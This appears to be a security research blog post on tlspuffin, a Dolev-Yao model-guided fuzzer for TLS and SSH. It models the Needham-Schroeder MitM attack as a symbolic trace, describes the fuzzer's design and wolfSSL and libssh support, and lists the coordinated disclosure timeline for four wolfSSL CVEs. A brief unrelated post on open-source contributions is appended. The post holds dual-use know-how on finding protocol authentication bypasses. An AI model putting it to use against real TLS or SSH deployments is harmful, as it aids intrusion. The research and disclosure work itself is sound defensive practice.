Dolev-Yao Traces

Dolev-Yao traces build on top of the Dolev-Yao model and also use a term algebra to represent messages symbolically. Just like in the Dolev-Yao model, the cryptographic primitives are treated as black boxes. This allows the fuzzer to focus on logical bugs, instead of testing cryptographic primitives for their correctness.

Let’s start with an example: the infamous Needham-Schroeder protocol. If you aren’t familiar, Needham-Schroeder is an authentication protocol that allows two parties to establish a shared secret through a trusted server; however, its asymmetric version is infamous for being susceptible to an MitM attack.

The protocol allows Alice and Bob to create a shared secret through a trusted third-party server. The protocol works by requesting a shared secret from the server that is encrypted once for Bob and once for Alice. Alice can request a fresh secret from the server and will receive an encrypted message that contains the shared secret and a further encrypted message addressed to Bob. Alice will forward the message to Bob. Bob can now decrypt the message and also has access to the shared secret.

The flaw in the protocol allows an imposter to impersonate Alice by first initiating a connection with Alice and then forwarding the received data to Bob. (For a deeper understanding of the protocol, we suggest reading its Wikipedia article.)

In the below Dolev-Yao trace T, we model one specific execution of the Needham-Schroeder protocol between the two agents with the names a and b. Each agent has an underlying implementation. The trace consists of a concatenation of steps that are delimited by a dot. There are two kinds of steps: input and output. Output steps are denoted by a bar above the agent name.

Dolev-Yao attack trace for the Needham-Schroeder protocol

Let’s now describe the semantics of trace T. (A deep understanding of the steps of this protocol is not needed. This example should just give you a feeling about the expressiveness of the Dolev-Yao model and what a Dolev-Yao trace is.)

In the first step, we send the term pk(sk_E) to agent a. Agent a will serialize the term and provide it to its underlying implementation of Needham-Schroeder.

Next, we let the agent a output a bitstring and bind it to h_1. By following the steps in the Dolev-Yao trace, we can observe that we now send the term aenc(adec(h_1, sk_E), pk(sk_B)) to agent b.

Next, we let agent b’s underlying implementation output a bitstring and bind it to h_2. The next two steps forward the message h_2 to agent a and bind its new output to h_3. Finally, we repeat the third and fourth step for a different input, namely h_3, and send the term h_3 to agent a.

Such traces allow us to model arbitrary execution flows of cryptographic protocols. The trace above models an MitM attack, originally discovered by Gavin Lowe. A fixed version of the protocol is known as the Needham-Schroeder-Lowe protocol.

TLS 1.3 Handshake Protocol

Before providing an example for a modern cryptographic protocol, I quickly want to explain the different phases of a TLS handshake.

Overview of the phases of a TLS handshake

  1. Key exchange: Establish shared keys and select the cryptographic methods and parameters. Neither message in this phase is encrypted.
  2. Server parameters: Exchange further parameters that are no longer sent in plaintext.
  3. Server authentication: Authenticate the server by confirming keys and handshake integrity.
  4. Client authentication: Optionally, authenticate the client by confirming keys and handshake integrity.

Just like in the Needham-Schroeder example, each message of the TLS handshake can be represented by a symbolic term. For example, the first Client Hello message can be represented as the term fn_client_hello(fn_key_share, fn_signature_algorithm, psk). In this example, fn_key_share, fn_signature_algorithm, and psk are constants.

For a more in-depth review of the handshake messages, see Section 2 of RFC 8446, which explains each one in detail.

Fuzzing Dolev-Yao Traces

The tlspuffin fuzzer implements Dolev-Yao traces and allows their execution in concrete fuzzing targets like OpenSSL, wolfSSL, and libssh.

Structure of tlspuffin. It follows the best practices defined by LibAFL.

The design of tlspuffin is based on the evolutionary fuzzer LibAFL. The fuzzer uses several concepts, which are illustrated in the following sections. We will follow traces on their journey from being picked from a seed corpus until they are mutated, executed, observed, and eventually become an attack trace.

Seed Corpus

Initially, the seed corpus contains handcrafted traces that represent common attack scenarios (e.g., the client, server, or MitM is the attacker).

Scheduler and Mutational Stage

The scheduler picks seeds based on a heuristic; for example, it might prefer shorter and more minimal traces. The picked traces are then mutated: messages are skipped, repeated, or changed. Because we use a Dolev-Yao model to represent messages, we can change fields of messages by swapping sub-terms or changing function symbols.
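One such mutation can be sketched as a sub-term replacement on a symbolic Client Hello (the tuple encoding and the large_bytes_vec symbol are illustrative, echoing the DOSC mutation described earlier, and are not tlspuffin’s real representation):

```python
import random

# A term is (function_symbol, list_of_subterms); constants have empty args.
client_hello = ("fn_client_hello",
                [("fn_key_share", []),
                 ("fn_signature_algorithm", []),
                 ("psk", [])])

def replace_random_subterm(term, replacement, rng):
    """Return a copy of `term` with one randomly chosen argument replaced."""
    symbol, args = term
    i = rng.randrange(len(args))
    new_args = list(args)
    new_args[i] = replacement
    return (symbol, new_args)

rng = random.Random(0)
# Swap one field of the Client Hello for an oversized byte vector.
mutated = replace_random_subterm(client_hello, ("large_bytes_vec", []), rng)
print(mutated)
```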

Executor, Feedback, and Objectives

After the traces have been mutated, they are sent to the executor. The executor is responsible for executing the traces in actual implementations such as OpenSSL or wolfSSL, either in the same process or in a fork for each input. The executor is also responsible for collecting observations about the execution. An observation is classified as feedback if it contains information about newly discovered code edges in terms of coverage. If the trace made the fuzzing target crash, or if an authentication bypass was witnessed, the trace is instead classified as an objective. The observation is then added to either the seed corpus or the objective corpus based on this classification.

Finally, we can repeat the process and start picking new traces from the seed corpus. This algorithm is quite common in fuzzing and is closely related to the approach of the classical AFL fuzzer. (For a more in-depth explanation of this particular algorithm, refer to the preprint LibAFL: A Framework to Build Modular and Reusable Fuzzers.)
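Putting the pieces together, the scheduler/mutator/executor loop can be sketched as follows (a schematic of the AFL/LibAFL-style algorithm; the trace type and the mutate and execute callbacks are stand-ins, not tlspuffin’s real API):

```python
import random

def fuzz_loop(seed_corpus, mutate, execute, iterations=100, rng=None):
    """Schematic evolutionary fuzzing loop: pick, mutate, execute, classify."""
    rng = rng or random.Random(0)
    corpus = list(seed_corpus)   # seed corpus of handcrafted traces
    objectives = []              # traces that triggered a security violation
    for _ in range(iterations):
        trace = rng.choice(corpus)        # scheduler: pick a seed
        candidate = mutate(trace, rng)    # mutational stage
        observation = execute(candidate)  # executor runs the trace
        if observation["crashed"] or observation["auth_bypass"]:
            objectives.append(candidate)  # objective: crash or logical bug
        elif observation["new_coverage"]:
            corpus.append(candidate)      # feedback: keep interesting traces
    return corpus, objectives

# Toy target: traces are integers, and the target "crashes" at value 5.
seen = set()
def toy_execute(t):
    new = t not in seen
    seen.add(t)
    return {"crashed": t >= 5, "auth_bypass": False, "new_coverage": new}

corpus, objectives = fuzz_loop([1], lambda t, rng: t + 1, toy_execute,
                               iterations=50)
print(sorted(set(corpus)), len(objectives))
```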

Internship Highlights

During my internship, we added several new features to tlspuffin that extended the tool along several dimensions:

  • Protocol implementations,
  • Cryptographic protocols,
  • Detection of security violations, and
  • Reproducibility of vulnerabilities.

Toward more Fuzzing Targets

Before my internship at Trail of Bits, tlspuffin already supported fuzzing several versions of OpenSSL (including version 1.0.1, which is vulnerable to Heartbleed) and LibreSSL. We designed an interface that added the capability to fuzz arbitrary protocol libraries. By implementing the interface for wolfSSL, we were able to add support for fuzzing wolfSSL 4.3.0 to 5.4.0, even though wolfSSL is not ABI compatible with OpenSSL or LibreSSL. Because the interface is written in Rust, implementing it for wolfSSL required us to create Rust bindings. The great thing about this is that the wolfSSL bindings can be reused outside of tlspuffin for embedded software projects. We released open-source wolfSSL bindings on GitHub.

This represents a milestone in library support. Previously, tlspuffin was bound to the OpenSSL API, which is supported only by LibreSSL and OpenSSL. With this interface, it will be possible to support arbitrary future fuzzing targets.

Toward more Protocols

Although tlspuffin was specifically designed for the TLS protocol, it can support other protocols as well. In fact, any protocol that is formalized in the Dolev-Yao model should also be fuzzable with tlspuffin. We added support for SSH, which required us to abstract over certain protocol primitives such as messages, message parsing, the term algebra, and knowledge queries. The abstractions we chose for TLS also, for the most part, work for SSH. However, the SSH protocol required a few adjustments because of its stateful serialization of protocol packets.

In order to test the SSH abstractions, we added support for fuzzing libssh (not to be confused with libssh2). As with wolfSSL, one of our first tasks was to create Rust bindings, which we plan to release separately as open-source software in the future.

Toward a better Security Violation Oracle

Detecting security violations other than segmentation faults, buffer overflows, or use-after-free is essential for protocol fuzzers. In the world of fuzzers, an oracle decides whether a specific execution of the program under test reached some objective.

When using sanitizers like AddressSanitizer, buffer overflows or over-reads can make the program crash. In traditional fuzzing, the oracle decides whether the classical objective “program crashed” is fulfilled. This allows oracles to detect not only program crashes caused by segmentation faults, but also memory-related issues.

Many security issues like authentication bypasses or protocol downgrades in TLS libraries do not make themselves obvious by crashing. To address this, tlspuffin features a more sophisticated oracle that can detect protocol-specific problems. This allowed tlspuffin to rediscover not just vulnerabilities like Heartbleed or CVE-2021-3449, but also logical vulnerabilities like FREAK. During my internship, we extended the capabilities of the security violation oracle to include authentication checks, which led us to rediscover two authentication bugs in wolfSSL (CVE-2022-25640 and CVE-2022-25638). In other words, tlspuffin rediscovered these vulnerabilities automatically, without human interaction.
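Such an oracle can be sketched as a predicate over claims recorded during a trace execution (the claim names here are illustrative, not tlspuffin’s actual claim model):

```python
def violates_client_auth(claims: dict) -> bool:
    """Flag runs where the server finished the handshake even though the
    required client certificate was never verified (an auth bypass)."""
    return bool(claims.get("handshake_finished")
                and claims.get("client_auth_required")
                and not claims.get("client_cert_verified"))

# A run exhibiting an authentication bypass:
bypass = {"handshake_finished": True,
          "client_auth_required": True,
          "client_cert_verified": False}
# A benign run:
ok = {"handshake_finished": True,
      "client_auth_required": True,
      "client_cert_verified": True}

print(violates_client_auth(bypass), violates_client_auth(ok))
# True False
```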

Toward better Reproducibility

If the fuzzer discovers an alleged attack trace, then we as security researchers have to validate the finding. A good way to verify results is to execute them against an actual target like a TLS server or client over TCP. By using default settings, we can ensure that the setup of the fuzzing target is not causing false positives.

During the internship, we worked on a feature that allows users to execute a Dolev-Yao trace against clients or servers over TCP, which allows us to test attack traces against targets in isolation. One of these targets could be an OpenSSL server that is reachable over TCP. Every OpenSSL installation comes with such a server, which can be started using openssl s_server -key key.pem -cert cert.pem. A similar test server exists for wolfSSL. We can now execute traces through tlspuffin and see if the server crashes, misbehaves, or simply errors.

As described above, this enabled us to verify CVE-2022-38153 and to determine that a crash happens only when using a specific setup of the wolfSSL library.


Considerations for implementation

For all its benefits, Dolev-Yao model-guided fuzzing also has drawbacks. Significant effort is required to integrate new fuzzing targets or protocols. Adding support for SSH took roughly five to six weeks, and adding a new fuzzing target took between one and two weeks. Finally, the fuzzer needed to be tested, bugs in the test harness needed to be resolved, and the fuzzer needed to run for a reasonable length of time; in our case, finding bugs took another week. Note that letting a single instance of the fuzzer run for a long time might not be the best approach. Restarting the fuzzer every few days is a good way to avoid getting stuck in a local minimum with respect to coverage.

Therefore, the overall process of applying Dolev-Yao model-guided fuzzing to an arbitrary cryptographic protocol and arbitrary implementation takes a few months. Based on these estimates, the fuzzing technique is best suited for ubiquitous protocols with multiple implementations like TLS or SSH, where the benefits outweigh the effort.

We noticed that protocol-specific features can increase the complexity of integration. For example, TLS uses transcripts, which can significantly increase the size of protocol messages. We applied a workaround for large transcripts in tlspuffin. In the case of SSH, we observed that message encoding and decoding is stateful, which means that messages are encoded differently based on the protocol state (a different MAC algorithm is used based on negotiated parameters).

In contrast, testing existing or future TLS or SSH implementations through Dolev-Yao model-guided fuzzing is very promising. Investing a couple of weeks seems reasonable given that once a library is integrated into tlspuffin, it can be fuzzed continuously across many versions.

Usage in test-suites

Developers can also use tlspuffin to write test suites. Traces can be executed against libraries to check for the absence of specific authentication bugs, which enables regression tests that ensure previously fixed bugs do not reappear. In other words, tlspuffin can be used for the same tasks for which TLS-Attacker is currently used.


To summarize, Dolev-Yao model-guided fuzzing is a novel and promising technique for fuzz-testing cryptographic protocols. It has proven its feasibility by rediscovering already-known authentication vulnerabilities and by finding new DoS attacks in wolfSSL.

tlspuffin is a good fit for high-impact and widely used protocols like TLS or SSH. Integrating a new protocol into tlspuffin takes significant effort and requires an in-depth understanding of the protocol. In traditional fuzzing, domain-specific knowledge is sometimes relatively unimportant because simple fuzzers in a standard configuration can yield strong results. This advantage is lost if tlspuffin is used for protocols that are not yet supported.

Despite this, tlspuffin shines when it is used on an already-supported protocol. The internet heavily depends on the TLS and SSH protocols, and security issues affecting them have far-reaching implications. If TLS or SSH breaks, then the internet breaks. Luckily, this has not happened yet due to the great work of security researchers around the world. Let’s keep it that way by verifying, testing, and fuzzing cryptographic protocols!

I would like to wholeheartedly thank my mentor, Opal Wright. She supported me throughout my internship and motivated me by giving me plenty of praise for my work. I’d also like to give a great thanks to the entire cryptography team, who provided me with valuable feedback. Last but not least, I would like to thank my friends at INRIA for hosting me last year for my master thesis, which led to the development of tlspuffin. Without their mentorship and fundamental research, this work would not have been possible.

Coordinated disclosure timeline

As part of the disclosure process, we reported four vulnerabilities in total to wolfSSL. The timeline of disclosure and remediation is provided below:

  • August 12, 2022: Contacted wolfSSL support to set up a secure channel.
  • August 12, 2022: Reported CVE-2022-38152 and CVE-2022-38153 to wolfSSL.

For CVE-2022-38152:

  • August 12, 2022: wolfSSL maintainers confirmed and fixed the vulnerability.

For CVE-2022-38153:

  • August 16, 2022: wolfSSL maintainers confirmed the vulnerability.
  • August 17, 2022: wolfSSL maintainers fixed the vulnerability.
  • August 30, 2022: wolfSSL released a fixed version, 5.5.0.
  • September 12, 2022: Reported CVE-2022-39173 to wolfSSL.

For CVE-2022-39173:

  • September 12, 2022: wolfSSL maintainers confirmed and fixed the vulnerability.
  • September 28, 2022: wolfSSL released a fixed version, 5.5.1.
  • October 9, 2022: Reported CVE-2022-42905 to wolfSSL.

For CVE-2022-42905:

  • October 10, 2022: wolfSSL maintainers confirmed and fixed the vulnerability.
  • October 28, 2022: wolfSSL released a fixed version, 5.5.2.

We would like to thank the team at wolfSSL for working swiftly with us to address these issues; they fixed one of the vulnerabilities on the same day it was submitted to them. The people involved at INRIA and Trail of Bits even got some swag delivered in appreciation of the disclosure.

Another prolific year of open-source contributions

By Samuel Moelius

This time last year, we wrote about the more than 190 Trail of Bits-authored pull requests that were merged into non-Trail of Bits repositories in 2021. In 2022, we continued that trend by having more than 400 pull requests merged into non-Trail of Bits repositories!

Why is this significant? While we take great pride in the tools that we develop, we recognize that we benefit from tools maintained outside of Trail of Bits. When one of those tools doesn’t work as we expect, we try to fix it. When a tool doesn’t fill the need we think it was meant to, we try to improve it. In short, we try to give back to the community that gives so much to us.

Here are a few highlights from the list of PRs at the end of this blog post:

The projects named below represent software of the highest quality. Software of this caliber doesn’t come from just merging PRs and publishing new releases; it comes from careful planning, prioritizing features, familiarity with related projects, and an understanding of the role that a project plays within the larger software ecosystem. We thank these projects’ maintainers both for the work the public sees and for innumerable hours spent on work the public doesn’t see.

We wish you a happy, safe, and similarly productive 2023!

Some of Trail of Bits’s 2022 Open-Source Contributions


Tech Infrastructure 

Software testing tools

Blockchain software